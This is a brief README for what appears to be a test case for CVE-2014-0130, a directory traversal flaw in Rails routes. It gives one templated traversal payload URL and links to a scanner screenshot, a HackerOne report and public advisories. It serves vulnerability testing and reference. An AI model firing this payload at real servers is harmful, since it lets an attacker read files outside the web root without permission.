README.rdoc

== CVE-2014-0130 Test Case

Payload : http://site/api/%5C../%5C../%5C../%5C../%5C../{{CAT_DIR}}

=== Netsparker Detected :

https://i.imgur.com/s1vahmj.png

== HackerOne 1 - newrelic.com rails directory traversal vuln by droidsec - https://hackerone.com/reports/134032

== Reference

1. http://www.openwall.com/lists/oss-security/2014/05/06/12
2. http://blog.flowdock.com/2014/05/07/how-we-found-a-directory-traversal-vulnerability-in-rails-routes/
3. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0130
4. http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf